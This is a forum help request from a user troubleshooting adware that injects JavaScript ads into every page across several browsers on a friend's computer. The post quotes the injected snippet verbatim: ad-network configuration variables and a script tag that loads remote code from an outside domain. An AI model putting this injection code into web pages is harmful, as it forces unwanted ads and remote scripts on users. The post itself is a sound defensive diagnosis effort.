Hello.
I'm not sure if this is the right forum to post my message on as I'm new on this forum.
Today one of my friend asked me to clean his computer because he had tons of ads on every single web site he visited.
Of course he tried to do a deep scan with Avast (free edition) but it couldn't find anything.
I've managed to isolate the cause of the issue. Something somewhere is injecting some javascript stuff at the end of every web page.
Here is exactly what is being injected. I've replace the values clientid, channelid and clientcreatetime (we never know ...).
var e_rfndmeclientid = 11111111;
var e_rfndmechannelid = '111111';
var e_rfndmecustomwidgettitle='FlashBeat';
var e_rfndmecustomatalink = '';
var e_rfndmesubid = 'CN1';
var e_rfndmegeo = 'gb';
var e_rfndmeclientcreatetime = 1111111111;
var e_rfndmeextid = '';
var e_displaysecondsinterval = 300;
var e_rfndme_sys_show_intext = true;
var e_rfndme_sys_intjs_display_seconds_interval = 300;
var e_sys_display_show_downloads = true;
var e_rfndme_sys_show_ws = true;
var e_rfndme_sys_show_easy2book = true;
var e_rfndme_sys_show_irobinhood = true;
var e_rfndme_sys_show_sfish = true;
var e_rfndme_sys_show_sgt = true;
var e_rfndme_sys_show_noproblem = true;
var e_rfndme_sys_show_engageya = true;
var e_rfndme_sys_show_display = true;
var e_rfndme_sys_add_profiledata = true;
var e_rfndme_sys_show_offerdynamic = true;
var e_rfndme_sys_show_intr_js = true;
var e_rfndme_sys_intjs_allow_video = true;
var e_rfndme_cc_shopping = true;
var e_rfndme_sys_show_intr_js_small_ads=true;
var e_rfndme_sys_show_ws_after = 20500;
var e_rfndme_sys_intjs_allow_ws = false;
var e_rfndme_sys_show_covus = false;
var e_rfndme_sys_show_pre_roll_video = false;
var e_rfndme_sys_show_imonnomy = true;
var e_rfndme_sys_show_728_banner = true;
var e_rfndme_sys_show_serp = false;
var e_sys_display_show_search_engine_pops=true;
e_sys_display_show_search_engine_pops=true;e_rfndme_sys_show_serp=true;
</script><script src="//s.orange81safe.com/gc0.js"></script>
This content is present on Internet Explorer, Firefox and Chrome.
I've done a couple of checks and it's not comming from the Kernel, apparently. All the modules/extensions on all the browsers have been disabled and uninstalled.
There's no proxy configured locally.
HTTPS connections are affected too. I've checked the certificates and everything looks alright.
So it means that the injections is happening internally in the process.
I'm just confused and intrigued about how it's being injected. Maybe a shared library or something ? Because it affects all the browsers installed on the machine.
So I've just created a new firewall rule so it can't download the javascript file anymore. But obviously this is not a long term solution.
Any help would be greatly appreciated.
Thank you.
